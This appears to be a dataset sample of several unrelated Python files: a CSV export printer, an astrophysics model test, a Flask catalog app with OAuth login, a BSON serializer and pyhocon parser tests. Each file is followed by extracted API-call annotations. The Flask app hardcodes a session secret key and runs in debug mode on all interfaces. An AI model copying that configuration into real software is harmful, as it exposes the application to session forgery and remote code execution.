self.queue.truncate(0)
# pylint: disable=g-bad-name
def writerows(self, rows):
"""Writes rows for CSV output.
Args:
rows: list of rows to write.
"""
for row in rows:
self.writerow(row)
class ExportPrinter(object):
"""Utility class to output a the data feed as tabular data."""
def __init__(self, writer):
"""Initializes the class.
Args:
writer: Typically an instance of UnicodeWriter. The interface for this
object provides two methods, writerow and writerow, which
accepts a list or a list of lists respectively and process them as
needed.
"""
self.writer = writer
def Output(self, results):
"""Outputs formatted rows of data retrieved from the Data Export API.
This uses the writer object to output the data in the Data Export API.
Args:
results: The response from the data export API.
"""
if not results.get('rows'):
self.writer.writerow('No Results found')
else:
self.OutputProfileName(results)
self.writer.writerow([])
self.OutputContainsSampledData(results)
self.writer.writerow([])
self.OutputQueryInfo(results)
self.writer.writerow([])
self.OutputHeaders(results)
self.OutputRows(results)
self.writer.writerow([])
self.OutputRowCounts(results)
self.OutputTotalsForAllResults(results)
def OutputProfileName(self, results):
"""Outputs the profile name along with the qurey."""
profile_name = ''
info = results.get('profileInfo')
if info:
profile_name = info.get('profileName')
self.writer.writerow(['Report For View (Profile): ', profile_name])
def OutputQueryInfo(self, results):
"""Outputs the query used."""
self.writer.writerow(['These query parameters were used:'])
query = results.get('query')
for key, value in query.iteritems():
if type(value) == types.ListType:
value = ','.join(value)
else:
value = str(value)
value = ExcelEscape(value)
self.writer.writerow([key, value])
def OutputContainsSampledData(self, results):
"""Outputs whether the resuls have been sampled."""
sampled_text = 'do not'
if results.get('containsSampledData'):
sampled_text = 'do'
row_text = 'These results %s contain sampled data.' % sampled_text
self.writer.writerow([row_text])
def OutputHeaders(self, results):
"""Outputs all the dimension and metric names in order."""
row = []
for header in results.get('columnHeaders'):
row.append(header.get('name'))
self.writer.writerow(row)
def OutputRows(self, results):
"""Outputs all the rows in the table."""
# Replace any first characters that have an = with '=
for row in results.get('rows'):
out_row = []
for cell in row:
cell = ExcelEscape(cell)
out_row.append(cell)
self.writer.writerow(out_row)
def OutputRowCounts(self, results):
"""Outputs how many rows were returned vs rows that were matched."""
items = str(results.get('itemsPerPage'))
matched = str(results.get('totalResults'))
output = [
['Rows Returned', items],
['Rows Matched', matched]
]
self.writer.writerows(output)
def OutputTotalsForAllResults(self, results):
"""Outputs the totals for all results matched by the query.
This is not the sum of the values returned in the response.
This will align the metric totals in the same columns as
the headers are printed. The totals are stored as a dict, where the
key is the metric name and the value is the total. To align these
totals in the proper columns, a position index of the metric name
and it's position in the table is first created. Then the totals
are added by position to a row of empty strings.
Args:
results: API Response from Core Reporting API.
"""
# Create the metric position index.
metric_index = {}
headers = results.get('columnHeaders')
for index in range(0, len(headers)):
header = headers[index]
if header.get('columnType') == 'METRIC':
metric_index[header.get('name')] = index
# Create a row of empty strings the same length as the header.
row = [''] * len(headers)
# Use the position index to output the totals in the right columns.
totals = results.get('totalsForAllResults')
for metric_name, metric_total in totals.iteritems():
index = metric_index[metric_name]
row[index] = metric_total
self.writer.writerows([['Totals For All Rows Matched'], row])
def ExcelEscape(input_value):
"""Escapes the first character of a string if it is special in Excel.
Args:
input_value: string The value to escape.
Returns:
A string that has the first character escaped if it is special.
"""
if input_value and input_value[0] in SPECIAL_CHARS:
return "'" + input_value
return input_value
| [
"StringIO.StringIO",
"csv.writer",
"codecs.getincrementalencoder"
] | [((2455, 2474), 'StringIO.StringIO', 'StringIO.StringIO', ([], {}), '()\n', (2472, 2474), False, 'import StringIO\n'), ((2493, 2540), 'csv.writer', 'csv.writer', (['self.queue'], {'dialect': 'dialect'}), '(self.queue, dialect=dialect, **kwds)\n', (2503, 2540), False, 'import csv\n'), ((2580, 2618), 'codecs.getincrementalencoder', 'codecs.getincrementalencoder', (['encoding'], {}), '(encoding)\n', (2608, 2618), False, 'import codecs\n')] |
"""
test_pop_models.py
Author: <NAME>
Affiliation: UCLA
Created on: Fri Jul 15 15:23:11 PDT 2016
Description:
"""
import ares
import matplotlib.pyplot as pl
PB = ares.util.ParameterBundle
def test():
# Create a simple population
pars_1 = PB('pop:fcoll') + PB('sed:bpass')
pop_fcoll = ares.populations.GalaxyPopulation(**pars_1)
#pop_fcoll_XR = ares.populations.GalaxyPopulation(**pars_1)
# Mimic the above population to check our different SFRD/SED techniques
sfrd_pars = {'pop_sfr_model': 'sfrd-func'}
sfrd_pars['pop_sfrd'] = pop_fcoll.SFRD
sfrd_pars['pop_sfrd_units'] = 'internal'
sed = PB('sed:toy')
sed['pop_Nion'] = pop_fcoll.src.Nion
sed['pop_Nlw'] = pop_fcoll.src.Nlw
# pop_Ex?
sed['pop_ion_src_igm'] = False
sed['pop_heat_src_igm'] = False
pars_2 = sed + sfrd_pars
pop_sfrd = ares.populations.GalaxyPopulation(**pars_2)
assert pop_fcoll.SFRD(20.) == pop_sfrd.SFRD(20.), "Error in SFRD."
# Check the emissivities too
#print(pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6))
#print(pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6))
#assert pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6) \
# == pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6), \
# "Error in photon luminosity density."
if __name__ == '__main__':
test()
| [
"ares.populations.GalaxyPopulation"
] | [((305, 348), 'ares.populations.GalaxyPopulation', 'ares.populations.GalaxyPopulation', ([], {}), '(**pars_1)\n', (338, 348), False, 'import ares\n'), ((877, 920), 'ares.populations.GalaxyPopulation', 'ares.populations.GalaxyPopulation', ([], {}), '(**pars_2)\n', (910, 920), False, 'import ares\n')] |
from flask import Flask, render_template, request, redirect, jsonify, g
from flask import url_for, flash, make_response
from flask import session as login_session
from sqlalchemy import create_engine, asc
from sqlalchemy.orm import sessionmaker
from models import Base, Category, Item, User
from oauth2client.client import flow_from_clientsecrets
from oauth2client.client import FlowExchangeError
import httplib2
import json
import requests
app = Flask(__name__)
# Retrieves client ID's and secrets from the json files
CLIENT_ID = json.loads(open('client_secrets.json', 'r')
.read())['web']['client_id']
APP_ID = json.loads(open('fb_client_secrets.json', 'r')
.read())['web']['app_id']
APP_SECRET = json.loads(open('fb_client_secrets.json', 'r')
.read())['web']['app_secret']
# Connect to Database and create database session
engine = create_engine('sqlite:///catalog.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
# Login handler
@app.route('/login')
def showLogin():
"""JSON API to view entire catalog Information."""
return render_template('login.html')
# Third Party Oauth callback
@app.route('/oauth/<provider>', methods=['POST'])
def oauthLogin(provider):
"""
Retrieves provider to process oauth login.
params:(string) oauth provider
"""
if provider == 'google':
code = request.data
try:
# Upgrade auth code into credentials object
oauth_flow = flow_from_clientsecrets('client_secrets.json',
scope='')
oauth_flow.redirect_uri = 'postmessage'
credentials = oauth_flow.step2_exchange(code)
except FlowExchangeError:
response = make_response(
json.dumps('Failed to upgrade the authorization code.'), 401)
response.headers['Content-Type'] = 'application/json'
return response
# Check for valid access token
access_token = credentials.access_token
url = 'https://www.googleapis.com/oauth2/v1/tokeninfo?' \
'access_token={}'.format(access_token)
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Access token error handling
if result.get('error') is not None:
response = make_response(json.dumps(result.get('error')), 500)
response.headers['Content-Type'] = ' application/json'
return response
# Store access token in session
login_session['provider'] = 'google'
login_session['access_token'] = access_token
login_session['gplus_id'] = credentials.id_token['sub']
# Get user info
userinfo_url = 'https://www.googleapis.com/oauth2/v1/userinfo'
params = {'access_token': login_session['access_token'], 'alt': 'json'}
answer = requests.get(userinfo_url, params=params)
data = json.loads(answer.text)
login_session['username'] = data['name']
login_session['picture'] = data['picture']
login_session['email'] = data['email']
elif provider == 'facebook':
access_token = request.data
url = 'https://graph.facebook.com/oauth/access_token?grant_type=' \
'fb_exchange_token&client_id={}&client_secret={}&' \
'fb_exchange_token={}'.format(APP_ID, APP_SECRET, access_token) # noqa
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Strip expire tag from access token
access_token = result['access_token']
url = 'https://graph.facebook.com/v2.11/me?access_token={}&fields=' \
'name,id,email,picture'.format(access_token) # noqa
h = httplib2.Http()
result = json.loads(h.request(url, 'GET')[1])
# Get user info
data = result
login_session['access_token'] = access_token
login_session['provider'] = 'facebook'
login_session['username'] = data['name']
login_session['email'] = data['email']
login_session['picture'] = data['picture']['data']['url']
login_session['facebook_id'] = data['id']
# Checks if user exists in DB
if getUserID(login_session['email']) is not None:
login_session['user_id'] = getUserID(login_session['email'])
else:
createUser(login_session)
login_session['user_id'] = getUserID(login_session['email'])
# Stores token in session
user = session.query(User).filter_by(email=login_session['email']).first()
token = user.generate_auth_token(600)
login_session['token'] = token
output = ''
output += '<h1>Welcome, {}!</h1>'.format(login_session['username'])
output += '<img src="{}" '.format(login_session['picture'])
output += 'style = "width: 300px; height: 300px; border-radius: 150px;' \
'-webkit-border-radius: 150px;-moz-border-radius: 150px;">'
flash('Now logged in as {}'.format(login_session['username']))
return output
def createUser(login_session):
newUser = User(username=login_session['username'],
email=login_session['email'],
picture=login_session['picture'])
session.add(newUser)
session.commit()
def getUserID(email):
try:
user = session.query(User).filter_by(email=email).one()
return user.id
except:
return None
# Revoke current user's token and reset login_session
@app.route('/logout')
def logout():
if 'provider' in login_session:
if login_session['provider'] == 'google':
del login_session['gplus_id']
if login_session['provider'] == 'facebook':
del login_session['facebook_id']
del login_session['access_token']
del login_session['username']
del login_session['picture']
del login_session['email']
del login_session['token']
flash("You have been successfully logged out.")
return redirect(url_for('showCatalog'))
else:
flash("No user has been logged in.")
return redirect(url_for('showCatalog'))
# JSON APIs to view Category Information.
@app.route('/catalog/JSON')
def catalogJSON():
categories = session.query(Category).all()
items = session.query(Item).order_by(Item.category_id).limit(3)
return jsonify(Categories=[c.serialize for c in categories],
Items=[i.serialize for i in items])
@app.route('/catalog/<category>/JSON')
def catalogCategoryJSON(category):
itemCategory = session.query(Category).filter_by(name=category).first()
items = session.query(Item).filter_by(category_id=itemCategory.id).all()
return jsonify(Categories=[itemCategory.serialize],
Items=[i.serialize for i in items])
@app.route('/catalog/<category>/<item>/JSON')
def categoryItemJSON(category, item):
itemCategory = session.query(Category).filter_by(name=category).first()
item = session.query(Item).filter_by(name=item,
category_id=itemCategory.id).first()
return jsonify(Category=[itemCategory.serialize],
Item=[item.serialize])
# Show all Categories and the latest items
@app.route('/')
@app.route('/catalog')
def showCatalog():
categories = session.query(Category).all()
items = session.query(Item).order_by(Item.category_id).limit(3)
if 'token' not in login_session:
return render_template('publiccatalog.html',
categories=categories, items=items)
else:
return render_template('catalog.html',
categories=categories, items=items)
# Show Items in a category item
@app.route('/catalog/<category>/')
def showCatalogCategory(category):
itemCategory = session.query(Category).filter_by(name=category).first()
items = session.query(Item).filter_by(category_id=itemCategory.id).all()
categories = session.query(Category).all()
if 'token' not in login_session:
return render_template('publiccategory.html',
items=items, category=itemCategory,
categories=categories)
else:
return render_template('category.html', items=items,
category=itemCategory, categories=categories)
# Show an item in a category
@app.route('/catalog/<category>/<item>/')
def showCategoryItem(category, item):
category = session.query(Category).filter_by(name=category).first()
item = session.query(Item).filter_by(name=item,
category_id=category.id).first()
categories = session.query(Category).all()
if 'token' not in login_session:
return render_template('publiccategoryitem.html',
item=item, category=category,
categories=categories)
return render_template('categoryitem.html', item=item,
category=category, categories=categories)
# Create a new item
@app.route('/catalog/category/new/', methods=['GET', 'POST'])
def newCategoryItem():
if 'token' not in login_session:
return redirect('/login')
categories = session.query(Category).all()
user = session.query(User).filter_by(email=login_session['email']).one()
if request.method == 'POST':
category = session.query(Category).filter_by(
name=request.form['category']).first()
newItem = Item(name=request.form['name'],
description=request.form['description'],
category_id=category.id, user_id=user.id)
session.add(newItem)
session.commit()
flash('New Item {} Successfully Added'.format(newItem.name))
return redirect(url_for('showCatalog'))
else:
return render_template('newcategoryitem.html', categories=categories)
# Edit a category item
@app.route('/catalog/<category>/<item>/edit', methods=['GET', 'POST'])
def editCategoryItem(category, item):
if 'token' not in login_session:
return redirect('/login')
user = session.query(User).filter_by(email=login_session['email']).first()
categoryItem = session.query(Category).filter_by(name=category).first()
editedItem = session.query(Item).filter_by(
name=item, category_id=categoryItem.id).first()
categories = session.query(Category).all()
if user.id != editedItem.user_id:
flash('You are not authorized to edit {}.'.format(item))
return redirect(url_for('showCategoryItem', category=categoryItem.name,
item=editedItem.name))
if request.method == 'POST':
if request.form['name']:
editedItem.name = request.form['name']
if request.form['description']:
editedItem.description = request.form['description']
if request.form['category']:
category = session.query(Category).filter_by(
name=request.form['category']).first()
editedItem.category_id = category.id
session.add(editedItem)
session.commit()
flash('Item Successfully Edited')
return redirect(url_for('showCategoryItem',
category=request.form['category'],
item=editedItem.name))
else:
return render_template('editcategoryitem.html',
category=categoryItem.name,
item=editedItem.name, categories=categories,
editedItem=editedItem)
# Delete a category item
@app.route('/catalog/<category>/<item>/delete', methods=['GET', 'POST'])
def deleteCategoryItem(category, item):
if 'token' not in login_session:
return redirect('/login')
user = session.query(User).filter_by(email=login_session['email']).first()
categoryItem = session.query(Category).filter_by(name=category).first()
itemToDelete = session.query(Item).filter_by(
name=item, category_id=categoryItem.id).first()
if user.id != itemToDelete.user_id:
flash('You are not authorized to delete {}.'.format(item))
return redirect(url_for('showCategoryItem', category=categoryItem.name,
item=itemToDelete.name))
if request.method == 'POST':
session.delete(itemToDelete)
session.commit()
flash('Item Successfully Deleted')
return redirect(url_for('showCatalog'))
else:
return render_template('deletecategoryitem.html',
category=categoryItem.name,
item=itemToDelete.name)
if __name__ == '__main__':
app.secret_key = 'N10kuN!'
app.debug = True
app.run(host='0.0.0.0', port=5000)
| [
"flask.render_template",
"sqlalchemy.orm.sessionmaker",
"json.loads",
"models.Item",
"flask.flash",
"flask.Flask",
"sqlalchemy.create_engine",
"json.dumps",
"oauth2client.client.flow_from_clientsecrets",
"requests.get",
"flask.url_for",
"flask.redirect",
"models.User",
"httplib2.Http",
"flask.jsonify"
] | [((448, 463), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (453, 463), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((905, 942), 'sqlalchemy.create_engine', 'create_engine', (['"""sqlite:///catalog.db"""'], {}), "('sqlite:///catalog.db')\n", (918, 942), False, 'from sqlalchemy import create_engine, asc\n'), ((984, 1009), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'engine'}), '(bind=engine)\n', (996, 1009), False, 'from sqlalchemy.orm import sessionmaker\n'), ((1154, 1183), 'flask.render_template', 'render_template', (['"""login.html"""'], {}), "('login.html')\n", (1169, 1183), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((5104, 5212), 'models.User', 'User', ([], {'username': "login_session['username']", 'email': "login_session['email']", 'picture': "login_session['picture']"}), "(username=login_session['username'], email=login_session['email'],\n picture=login_session['picture'])\n", (5108, 5212), False, 'from models import Base, Category, Item, User\n'), ((6374, 6467), 'flask.jsonify', 'jsonify', ([], {'Categories': '[c.serialize for c in categories]', 'Items': '[i.serialize for i in items]'}), '(Categories=[c.serialize for c in categories], Items=[i.serialize for\n i in items])\n', (6381, 6467), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((6724, 6809), 'flask.jsonify', 'jsonify', ([], {'Categories': '[itemCategory.serialize]', 'Items': '[i.serialize for i in items]'}), '(Categories=[itemCategory.serialize], Items=[i.serialize for i in items]\n )\n', (6731, 6809), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((7128, 7193), 'flask.jsonify', 'jsonify', ([], {'Category': '[itemCategory.serialize]', 'Item': '[item.serialize]'}), '(Category=[itemCategory.serialize], Item=[item.serialize])\n', (7135, 7193), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8953, 9046), 'flask.render_template', 'render_template', (['"""categoryitem.html"""'], {'item': 'item', 'category': 'category', 'categories': 'categories'}), "('categoryitem.html', item=item, category=category,\n categories=categories)\n", (8968, 9046), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((2218, 2233), 'httplib2.Http', 'httplib2.Http', ([], {}), '()\n', (2231, 2233), False, 'import httplib2\n'), ((2937, 2978), 'requests.get', 'requests.get', (['userinfo_url'], {'params': 'params'}), '(userinfo_url, params=params)\n', (2949, 2978), False, 'import requests\n'), ((2994, 3017), 'json.loads', 'json.loads', (['answer.text'], {}), '(answer.text)\n', (3004, 3017), False, 'import json\n'), ((5957, 6004), 'flask.flash', 'flash', (['"""You have been successfully logged out."""'], {}), "('You have been successfully logged out.')\n", (5962, 6004), False, 'from flask import url_for, flash, make_response\n'), ((6071, 6107), 'flask.flash', 'flash', (['"""No user has been logged in."""'], {}), "('No user has been logged in.')\n", (6076, 6107), False, 'from flask import url_for, flash, make_response\n'), ((7483, 7556), 'flask.render_template', 'render_template', (['"""publiccatalog.html"""'], {'categories': 'categories', 'items': 'items'}), "('publiccatalog.html', categories=categories, items=items)\n", (7498, 7556), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((7613, 7680), 'flask.render_template', 'render_template', (['"""catalog.html"""'], {'categories': 'categories', 'items': 'items'}), "('catalog.html', categories=categories, items=items)\n", (7628, 7680), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8068, 8169), 'flask.render_template', 'render_template', (['"""publiccategory.html"""'], {'items': 'items', 'category': 'itemCategory', 'categories': 'categories'}), "('publiccategory.html', items=items, category=itemCategory,\n categories=categories)\n", (8083, 8169), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8253, 8348), 'flask.render_template', 'render_template', (['"""category.html"""'], {'items': 'items', 'category': 'itemCategory', 'categories': 'categories'}), "('category.html', items=items, category=itemCategory,\n categories=categories)\n", (8268, 8348), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((8784, 8883), 'flask.render_template', 'render_template', (['"""publiccategoryitem.html"""'], {'item': 'item', 'category': 'category', 'categories': 'categories'}), "('publiccategoryitem.html', item=item, category=category,\n categories=categories)\n", (8799, 8883), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((9229, 9247), 'flask.redirect', 'redirect', (['"""/login"""'], {}), "('/login')\n", (9237, 9247), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((9528, 9646), 'models.Item', 'Item', ([], {'name': "request.form['name']", 'description': "request.form['description']", 'category_id': 'category.id', 'user_id': 'user.id'}), "(name=request.form['name'], description=request.form['description'],\n category_id=category.id, user_id=user.id)\n", (9532, 9646), False, 'from models import Base, Category, Item, User\n'), ((9885, 9947), 'flask.render_template', 'render_template', (['"""newcategoryitem.html"""'], {'categories': 'categories'}), "('newcategoryitem.html', categories=categories)\n", (9900, 9947), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((10134, 10152), 'flask.redirect', 'redirect', (['"""/login"""'], {}), "('/login')\n", (10142, 10152), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((11183, 11216), 'flask.flash', 'flash', (['"""Item Successfully Edited"""'], {}), "('Item Successfully Edited')\n", (11188, 11216), False, 'from flask import url_for, flash, make_response\n'), ((11416, 11557), 'flask.render_template', 'render_template', (['"""editcategoryitem.html"""'], {'category': 'categoryItem.name', 'item': 'editedItem.name', 'categories': 'categories', 'editedItem': 'editedItem'}), "('editcategoryitem.html', category=categoryItem.name, item=\n editedItem.name, categories=categories, editedItem=editedItem)\n", (11431, 11557), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((11838, 11856), 'flask.redirect', 'redirect', (['"""/login"""'], {}), "('/login')\n", (11846, 11856), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((12465, 12499), 'flask.flash', 'flash', (['"""Item Successfully Deleted"""'], {}), "('Item Successfully Deleted')\n", (12470, 12499), False, 'from flask import url_for, flash, make_response\n'), ((12573, 12672), 'flask.render_template', 'render_template', (['"""deletecategoryitem.html"""'], {'category': 'categoryItem.name', 'item': 'itemToDelete.name'}), "('deletecategoryitem.html', category=categoryItem.name, item\n =itemToDelete.name)\n", (12588, 12672), False, 'from flask import Flask, render_template, request, redirect, jsonify, g\n'), ((1540, 1596), 'oauth2client.client.flow_from_clientsecrets', 'flow_from_clientsecrets', (['"""client_secrets.json"""'], {'scope': '""""""'}), "('client_secrets.json', scope='')\n", (1563, 1596), False, 'from oauth2client.client import flow_from_clientsecrets\n'), ((3465, 3480), 'httplib2.Http', 'httplib2.Http', ([], {}), '()\n', (3478, 3480), False, 'import httplib2\n'), ((3779, 3794), 'httplib2.Http', 'httplib2.Http', ([], {}), '()\n', (3792, 3794), False, 'import httplib2\n'), ((6029, 6051), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (6036, 6051), False, 'from flask import url_for, flash, make_response\n'), ((6132, 6154), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (6139, 6154), False, 'from flask import url_for, flash, make_response\n'), ((9836, 9858), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (9843, 9858), False, 'from flask import url_for, flash, make_response\n'), ((10586, 10663), 'flask.url_for', 'url_for', (['"""showCategoryItem"""'], {'category': 'categoryItem.name', 'item': 'editedItem.name'}), "('showCategoryItem', category=categoryItem.name, item=editedItem.name)\n", (10593, 10663), False, 'from flask import url_for, flash, make_response\n'), ((11241, 11330), 'flask.url_for', 'url_for', (['"""showCategoryItem"""'], {'category': "request.form['category']", 'item': 'editedItem.name'}), "('showCategoryItem', category=request.form['category'], item=\n editedItem.name)\n", (11248, 11330), False, 'from flask import url_for, flash, make_response\n'), ((12249, 12328), 'flask.url_for', 'url_for', (['"""showCategoryItem"""'], {'category': 'categoryItem.name', 'item': 'itemToDelete.name'}), "('showCategoryItem', category=categoryItem.name, item=itemToDelete.name)\n", (12256, 12328), False, 'from flask import url_for, flash, make_response\n'), ((12524, 12546), 'flask.url_for', 'url_for', (['"""showCatalog"""'], {}), "('showCatalog')\n", (12531, 12546), False, 'from flask import url_for, flash, make_response\n'), ((1844, 1899), 'json.dumps', 'json.dumps', (['"""Failed to upgrade the authorization code."""'], {}), "('Failed to upgrade the authorization code.')\n", (1854, 1899), False, 'import json\n')] |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2020~2999 - Cologler <<EMAIL>>
# ----------
#
# ----------
import bson
import struct
from ..err import SerializeError
from ..abc import *
from ..core import register_format
@register_format('bson', '.bson')
class BsonSerializer(ISerializer):
format_name = 'bson'
def loadb(self, b: bytes, options: dict) -> Any:
kwargs = {}
kwargs.update(Options.pop_origin_kwargs(options))
self.check_options(options)
try:
return bson.loads(b, **kwargs)
except Exception as e:
raise SerializeError(e)
def dumpb(self, obj, options: dict) -> bytes:
kwargs = {}
kwargs.update(Options.pop_origin_kwargs(options))
self.check_options(options)
try:
return bson.dumps(obj, **kwargs)
except Exception as e:
raise SerializeError(e)
| [
"bson.dumps",
"bson.loads"
] | [((512, 535), 'bson.loads', 'bson.loads', (['b'], {}), '(b, **kwargs)\n', (522, 535), False, 'import bson\n'), ((800, 825), 'bson.dumps', 'bson.dumps', (['obj'], {}), '(obj, **kwargs)\n', (810, 825), False, 'import bson\n')] |
# -*- encoding: utf-8 -*-
import json
import os
import shutil
import tempfile
from collections import OrderedDict
from datetime import timedelta
from pyparsing import ParseBaseException, ParseException, ParseSyntaxException
import mock
import pytest
from pyhocon import (ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree)
from pyhocon.exceptions import (ConfigException, ConfigMissingException,
ConfigWrongTypeException)
try:
from dateutil.relativedelta import relativedelta as period
except Exception:
from datetime import timedelta as period
class TestConfigParser(object):
def test_parse_simple_value(self):
config = ConfigFactory.parse_string(
"""t = {
c = 5
"d" = true
e.y = {
f: 7
g: "hey dude!"
h: hey man
i = \"\"\"
"first line"
"second" line
\"\"\"
}
j = [1, 2, 3]
u = 192.168.1.3/32
g = null
}
"""
)
assert config.get_string('t.c') == '5'
assert config.get_int('t.c') == 5
assert config.get_float('t.c') == 5.0
assert config.get('t.e.y.f') == 7
assert config.get('t.e.y.g') == 'hey dude!'
assert config.get('t.e.y.h') == 'hey man'
assert [v.strip() for v in config.get('t.e.y.i').split('\n')] == ['', '"first line"', '"second" line', '']
assert config.get_bool('t.d') is True
assert config.get_int('t.e.y.f') == 7
assert config.get('t.j') == [1, 2, 3]
assert config.get('t.u') == '192.168.1.3/32'
assert config.get_int('t.g') is None
assert config.get_float('t.g') is None
assert config.get_string('t.g') is None
assert config.get_bool('t.g') is None
assert config.get_list('t.g') is None
assert config.get_config('t.g') is None
@pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&'])
def test_fail_parse_forbidden_characters(self, forbidden_char):
with pytest.raises(ParseBaseException):
ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char))
@pytest.mark.parametrize('forbidden_char', ['$', '"'])
def test_fail_parse_forbidden_characters_in_context(self, forbidden_char):
with pytest.raises(ParseException):
ConfigFactory.parse_string('a: hey man{}'.format(forbidden_char))
@pytest.mark.parametrize('forbidden_char', ['+', '`', '^', '?', '!', '@', '*', '&'])
def test_parse_forbidden_characters_quoted(self, forbidden_char):
value = "hey man{}".format(forbidden_char)
config = ConfigFactory.parse_string('a: "{}"'.format(value))
assert config.get_string("a") == value
def test_parse_with_enclosing_brace(self):
config = ConfigFactory.parse_string(
"""
{
a: {
b: 5
}
}
"""
)
assert config.get_string('a.b') == '5'
@pytest.mark.parametrize('data_set', [
('a: 1 minutes', period(minutes=1)),
('a: 1minutes', period(minutes=1)),
('a: 2 minute', period(minutes=2)),
('a: 3 m', period(minutes=3)),
('a: 3m', period(minutes=3)),
('a: 3 min', '3 min'),
('a: 4 seconds', period(seconds=4)),
('a: 5 second', period(seconds=5)),
('a: 6 s', period(seconds=6)),
('a: 6 sec', '6 sec'),
('a: 7 hours', period(hours=7)),
('a: 8 hour', period(hours=8)),
('a: 9 h', period(hours=9)),
('a: 10 weeks', period(weeks=10)),
('a: 11 week', period(weeks=11)),
('a: 12 w', period(weeks=12)),
('a: 10 days', period(days=10)),
('a: 11 day', period(days=11)),
('a: 12 d', period(days=12)),
('a: 110 microseconds', period(microseconds=110)),
('a: 111 microsecond', period(microseconds=111)),
('a: 112 micros', period(microseconds=112)),
('a: 113 micro', period(microseconds=113)),
('a: 114 us', period(microseconds=114)),
('a: 110 milliseconds', timedelta(milliseconds=110)),
('a: 111 millisecond', timedelta(milliseconds=111)),
('a: 112 millis', timedelta(milliseconds=112)),
('a: 113 milli', timedelta(milliseconds=113)),
('a: 114 ms', timedelta(milliseconds=114)),
('a: 110 nanoseconds', period(microseconds=0)),
('a: 11000 nanoseconds', period(microseconds=11)),
('a: 1110000 nanosecond', period(microseconds=1110)),
('a: 1120000 nanos', period(microseconds=1120)),
('a: 1130000 nano', period(microseconds=1130)),
('a: 1140000 ns', period(microseconds=1140)),
])
def test_parse_string_with_duration(self, data_set):
config = ConfigFactory.parse_string(data_set[0])
assert config['a'] == data_set[1]
def test_parse_string_with_duration_with_long_unit_name(self):
config = ConfigFactory.parse_string(
"""
a: foo
b: 10 weeks
c: bar
"""
)
assert config['b'] == period(weeks=10)
def test_parse_with_list_mixed_types_with_durations_and_trailing_comma(self):
config = ConfigFactory.parse_string(
"""
a: foo
b: [a, 1, 10 weeks, 5 minutes,]
c: bar
"""
)
assert config['b'] == ['a', 1, period(weeks=10), period(minutes=5)]
def test_parse_with_enclosing_square_bracket(self):
config = ConfigFactory.parse_string("[1, 2, 3]")
assert config == [1, 2, 3]
def test_quoted_key_with_dots(self):
config = ConfigFactory.parse_string(
"""
"a.b.c.d": 3
t {
"d": {
"c": 5
}
}
k {
"b.f.d": 7
}
"""
)
assert config['"a.b.c.d"'] == 3
assert config['t.d.c'] == 5
assert config['k."b.f.d"'] == 7
def test_dotted_notation_merge(self):
config = ConfigFactory.parse_string(
"""
a {
b = foo
c = bar
}
a.c = ${a.b}" "${a.b}
a.d = baz
"""
)
assert config['a.b'] == "foo"
assert config['a.c'] == "foo foo"
assert config['a.d'] == "baz"
def test_comma_to_separate_expr(self):
config = ConfigFactory.parse_string(
"""
a=1,
b="abc",
c=the man,
d=woof,
a-b-c-d=test,
a b c d=test2,
"a b c d e"=test3
"""
)
assert config.get('a') == 1
assert config.get('b') == 'abc'
assert config.get('c') == 'the man'
assert config.get('d') == 'woof'
assert config.get('a-b-c-d') == 'test'
assert config.get('a b c d') == 'test2'
assert config.get('a b c d e') == 'test3'
def test_dict_merge(self):
config = ConfigFactory.parse_string(
"""
a {
d {
g.h.j.u: 5
g {
h.d: 4
}
g.h.k: f d
}
h.i.m = 7
h.i {
d: 5
}
h.i {
e:65
}
}
""")
expected_result = {
"a": {
"d": {
"g": {
"h": {
"j": {
"u": 5
},
"d": 4,
"k": "f d"
}
}
},
"h": {
"i": {
"m": 7,
"d": 5,
"e": 65
}
}
}
}
assert expected_result == config
def test_parse_with_comments(self):
config = ConfigFactory.parse_string(
"""
// comment 1
# comment 2
{
c = test // comment 0
g = 6 test # comment 0
# comment 3
a: { # comment 4
b: test, # comment 5
} # comment 6
t = [1, # comment 7
2, # comment 8
3, # comment 9
]
} # comment 10
// comment 11
// comment 12
"""
)
assert config.get('c') == 'test'
assert config.get('g') == '6 test'
assert config.get('a.b') == 'test'
assert config.get_string('a.b') == 'test'
assert config.get('t') == [1, 2, 3]
def test_missing_config(self):
config = ConfigFactory.parse_string(
"""
a = 5
"""
)
# b is not set so show raise an exception
with pytest.raises(ConfigMissingException):
config.get('b')
def test_parse_null(self):
config = ConfigFactory.parse_string(
"""
a = null
b = [null]
"""
)
assert config.get('a') is None
assert config.get('b')[0] is None
def test_parse_override(self):
config = ConfigFactory.parse_string(
